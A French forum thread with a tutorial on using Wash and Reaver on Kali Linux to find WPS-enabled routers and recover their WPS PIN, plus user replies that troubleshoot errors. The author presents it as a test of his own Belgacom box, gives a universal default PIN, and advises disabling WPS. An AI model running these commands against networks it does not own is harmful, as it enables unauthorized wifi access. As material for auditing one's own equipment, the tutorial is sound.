[Tuto]Reaver & Wash avec ALFA AWUS36H sur Kali Linux 1.0.9a

IceF0x · 17-01-2015 17:40:36

== Description ==

Wash est un utilitaire pour identifier les points d'accès ou WPS activé, wash est un outil de test de présence d'option WPS inclu dans reaver depuis la version 1.4.
Reaver est un outil qui permet de bruteforcer le PIN des point d'accès ou le WPS est activé.

== Installation ==

Reaver est pré-installé sous la version complète de Kali Linux, pour la version mini il suffit d'installer son paquet

apt-get install reaver

== Utilisation ==

Pour ce test, j'ai utilisé mon antenne ALFA AWUS036H sur une Box Belgacom Bbox2 m'appartenant, j'ai réinitialisé la Bbox puis je l'ai laissé 48h connectée afin d'avoir la configuration par défaut et les mises à jours qui se font automatiquement en ligne toutes les 24h.
La distribution utilisée est la version 1.0.9a de Kali Linux Openbox avec toutes les mises à jours, Openbox n'est qu'un gestionnaire de fenêtre, il n'y a aucune différence avec la version Gnome traditionnelle.

Pour commencer, branchez votre ALFA et vérifier qu'elle est bien reconnue par le système avec airmon-ng.

airmon-ng

Ensuite mettez votre interface en mode monitor après avoir stoppé le service network-manager (je ne l'ai pas stoppé, mais il se peut que cela provoque des soucis lors du test).

service network-manager stop

Et

airmon-ng start wlan0

Puis tentez un scan avec wash

wash -i mon0

Si vous voyez s'afficher ce genre de message:

Utilisez l'option "--ignore-fcs", option qui devrait résoudre ce problème.

wash -i mon0 --ignore-fcs

Vous devriez voir un retour comme ci-dessous.

Une fois le point d'accès choisi, nous pouvons passer à l'attaque reaver, comme je n'ai pas des heures à consacrer au bruteforce, j'opte pour l'option --pin vu que bien entendu je connais le pin par défaut des box belgacom voir topic suivant: http://linuxtrack.net/viewtopic.php?id=157 .

reaver -i mon0 -b <BSSID> --pin 12345670

Le code pin par défaut des Bbox2 de Belgacom est toujours le même comme pour certain routeur Sagem, je n'ai pas l'info pour les Bbox3 par contre vu que je ne possède pas encore ce modèle.

Résultat:

== Conclusion ==

Le test avec la carte ALFA est concluant et rapide (moins de 5 minutes), j'ai rapidement pu constater que le réglage par défaut des Bbox2 de Belgacom n'était pas du tout sécurisé, chez moi je désactive même cette option.
La carte ALFA convient parfaitement pour ce genre de petits tests rapides, aucune défaillance à condition de bien suivre la documentation.
Il en va de même pour Kali Linux qui n'a souffert d'aucun bug pendant le test.

== Voir aussi ==

* **(en)** http://www.kalitutorials.net/2014/04/ha … linux.html
* **(fr)** http://fr.wikipedia.org/wiki/Wi-Fi_Protected_Setup

ZeR0-@bSoLu · 17-01-2015 19:47:16

Merci une fois de plus pour ce partage Monsieur le Coyote big_smile
Ce tuto confirme une fois de plus que cette carte est vraiment pas mal , surtout pour son prix je trouve

WangXiangzhai · 18-01-2015 00:58:40

IceF0x a écrit :

Il en va de même pour Kali Linux qui n'a souffert d'aucun bug pendant le test.

reçu 5/5

merci.

Toky13 · 20-04-2015 15:50:01

Bonjour,

J'aimerais qu'une personne puisse exposer mon probléme et me donner des éléments clé à comprendre se qui ne fonctionne pas avec reaver and wash

Voici mes commandes:

Airmon-ng
airmon-ng start wlan0

wash -i mono -C

-C (--ignore-fcs) pour ignorer les Frame Checksum Error.

J'obtiens:

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
00:17:33:3B:49:6C       7            -63             1.0                          No               NEUF_496

Ensuite avec reaver:

reaver -i  -b 00:17:33:3B:49:6C -c 7 -N -S -vv

voilà ce que j'obtiens:

Trying pin 12345670
    Sending EAPOL START request
    Received identity request
    Sending identity response
    [!] WARNING: Receive timeout occured
    Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    Trying pin 12345670
    Sending EAPOL START request

Il me semble que c'est du à un signal trop faible et j'aimerais connaître comment puis-je corriger cela hormis si le fait de me procurer un adaptateur wifi plus performant.
Existe il une procédure autre.

Cdt ,

toky

wagmic · 22-04-2015 22:12:25

bonsoir merci pour

l ennemi de Bipbip a écrit :

Utilisez l'option "--ignore-fcs", option qui devrait résoudre ce problème.

je m etais toujours demandée pourquoi j avais ce pb alors qu'avec wifite ca ne le faisait pas
maintenant je sais merci

amchich · 22-08-2016 18:11:02

tres bon travail

mais ca plante chez moi

quand je lance wash -i mon0 ca me met une erreur:

root@kalibah:~# wash -i mon0

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[X] ERROR: Failed to open 'mon0' for capturing

IceF0x · 22-08-2016 19:32:49

amchich a écrit :

[X] ERROR: Failed to open 'mon0' for capturing

Es-tu sür que ta carte se nomme mon0 et pas plutôt wlan0mon ?

#1 17-01-2015 17:40:36

[Tuto]Reaver & Wash avec ALFA AWUS36H sur Kali Linux 1.0.9a

#2 17-01-2015 19:47:16

Re : [Tuto]Reaver & Wash avec ALFA AWUS36H sur Kali Linux 1.0.9a

#3 18-01-2015 00:58:40

Re : [Tuto]Reaver & Wash avec ALFA AWUS36H sur Kali Linux 1.0.9a

#4 20-04-2015 15:50:01

Re : [Tuto]Reaver & Wash avec ALFA AWUS36H sur Kali Linux 1.0.9a

#5 22-04-2015 22:12:25

Re : [Tuto]Reaver & Wash avec ALFA AWUS36H sur Kali Linux 1.0.9a

#6 22-08-2016 18:11:02

Re : [Tuto]Reaver & Wash avec ALFA AWUS36H sur Kali Linux 1.0.9a

#7 22-08-2016 19:32:49

Re : [Tuto]Reaver & Wash avec ALFA AWUS36H sur Kali Linux 1.0.9a

Pied de page des forums